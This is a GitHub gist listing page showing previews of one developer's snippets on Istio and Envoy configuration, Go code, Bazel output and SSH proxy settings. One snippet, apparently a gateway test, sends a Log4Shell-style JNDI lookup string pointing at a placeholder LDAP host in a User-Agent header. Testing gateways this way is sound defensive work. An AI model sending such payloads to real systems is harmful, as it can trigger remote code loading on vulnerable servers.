Skip to content

Instantly share code, notes, and snippets.

View incfly's full-sized avatar

Jianfei Hu incfly

69 followers · 7 following
  • ClickHouse
  • San Francisco Bay Area
View GitHub Profile
@incfly
incfly / problem.go
Created June 2, 2022 22:02
package main
type eventType int
const (
addWord eventType = 0
removeWord
)
type event struct {
@incfly
incfly / authn-authz.yaml
Created May 27, 2022 18:56
conditional-authservice
apiVersion: security.istio.io/v1beta1
kind: RequestAuthentication
metadata:
name: httpbin
namespace: foo
spec:
selector:
matchLabels:
app: httpbin
jwtRules:
@incfly
incfly / authz.yaml
Created April 29, 2022 18:51
istio-rbac-customize-error-message
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
name: allow-nothing
namespace: default
spec:
{}
@incfly
incfly / app.go
Last active April 28, 2022 20:24
envoy-local-reply-not-working
// +build ignore
package main
import (
"flag"
"fmt"
"net"
"net/http"
"strconv"
@incfly
incfly / bazel-query
Last active April 5, 2022 02:56
$ bazel cquery --define boringssl=fips "//source/extensions/transport_sockets/tls/cert_validator:cert_validator_lib" --output=build
Starting local Bazel server and connecting to it...
INFO: Invocation ID: f7ce5045-4ac3-4146-9a65-7434359a79b1
INFO: SHA256 (https://golang.org/dl/?mode=json&include=all) = 8894bb6908be51c3ad0177954dbd7c3355de9c6a5960b2cb550c8b68ca953b79
INFO: Analyzed target //source/extensions/transport_sockets/tls/cert_validator:cert_validator_lib (247 packages loaded, 17216 targets configured).
INFO: Found 1 target...
# /home/fly/workspace/github.com/envoyproxy/envoy/source/extensions/transport_sockets/tls/cert_validator/BUILD:11:17
cc_library(
name = "cert_validator_lib",
visibility = ["//visibility:public"],
@incfly
incfly / httpbin-ingress.yaml
Last active March 8, 2022 13:40
httpbin-tls-cert-extra-bytes.
apiVersion: v1
kind: ServiceAccount
metadata:
name: httpbin
---
apiVersion: v1
kind: Secret
metadata:
name: httpbin-credential
namespace: istio-system
@incfly
incfly / test-status.yaml
Created January 6, 2022 10:33
# 2022-01-06T09:32:48.168864Z info status jianfeih debug, config:
# fqn gateway.xcp.tetrate.io/v2/IngressGateway:xcp-edge/test-ingress-gateway,
# status {gateway.xcp.tetrate.io/v2/IngressGateway:xcp-edge/test-ingress-gateway READY
# [name:"test-ingress-gateway" namespace:"echo-7-93217" result:READY
# name:"test-ingress-gateway-httpbin-mesh-internal" namespace:"echo-7-93217" result:READY
# name:"test-ingress-gateway-mesh-external" namespace:"echo-7-93217" result:READY
# name:"vs-app2-tetrate-io" namespace:"echo-7-93217" result:READY ] {} [] 0}
# Apply this in xcp-edge works, but in xcp-system not works (not propagating to the xcp-edge namespace.)
@incfly
incfly / step1-curl.sh
Last active January 5, 2022 07:58
curl -H “Host: httpbin.tetrate.com” -H “User-Agent: ${JNDI://ldap://evial.xx/path}” \
–resolve “httpbin.tetrate.com:${GATEWAY_IP}” httpbin.tetrate.com/headers
< HTTP/1.1 200 OK
< server: envoy
< date: Tue, 28 Dec 2021 05:48:57 GMT
< content-type: application/json
< content-length: 28
< access-control-allow-origin: *
< access-control-allow-credentials: true
< x-envoy-upstream-service-time: 25
@incfly
incfly / ssh-gcp-from-china.config
Created December 16, 2021 09:05
# Windows config.
Host <inst-name>
HostName <ip>
User fly
IdentityFile C:\Users\hujia\.ssh\google_compute_engine
# In windows, Clash proxy runs in localhost, use nmap for access. https://nmap.org/download.html
ProxyCommand C:\workspace\programs\Nmap\ncat.exe --proxy-type socks5 --proxy 127.0.0.1:7890 %h %p
# Linux config.
Host loomer-jp
HostName 34.84.98.136
@incfly
incfly / envoy-filter.yaml
Last active February 6, 2023 20:16
apiVersion: networking.istio.io/v1alpha3
kind: EnvoyFilter
metadata:
name: lua
spec:
workloadSelector:
labels:
app: httpbin
configPatches:
- applyTo: HTTP_FILTER